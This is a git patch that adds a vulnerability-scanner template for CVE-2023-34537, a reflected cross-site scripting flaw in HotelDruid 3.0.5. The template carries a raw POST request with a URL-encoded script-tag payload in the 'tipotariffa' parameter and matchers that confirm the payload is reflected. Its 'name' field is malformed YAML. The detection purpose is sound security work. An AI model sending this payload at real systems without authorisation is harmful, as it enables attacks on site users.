From 1cca7c3bb370b967e7856478bfcc077e9d59778f Mon Sep 17 00:00:00 2001
From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com>
Date: Sat, 24 Jun 2023 19:46:18 +0530
Subject: [PATCH] Create CVE-2023-34537.yaml

---
 http/cves/2023/CVE-2023-34537.yaml | 39 ++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-34537.yaml

diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml
new file mode 100644
index 0000000000..9d8a38f841
--- /dev/null
+++ b/http/cves/2023/CVE-2023-34537.yaml
@@ -0,0 +1,39 @@
+id: CVE-2023-34537
+
+info:
+  name: Hoteldruid - Reflected XSS
+   - Cross Site Scripting
+  author: Harsh
+  severity: medium
+  description: |
+    A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.
+  reference:
+    - https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-34537
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2023-34537
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2023,hoteldrui,reflected,xss,unauth
+
+http:
+  - raw:
+      - |
+        POST /hoteldruid/creaprezzi.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        
+        anno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1
+
+    cookie-reuse: true
+    redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "<script>alert(document.domain)</script>")'
+          - 'contains(body_1, "HotelDruid")'
+        condition: and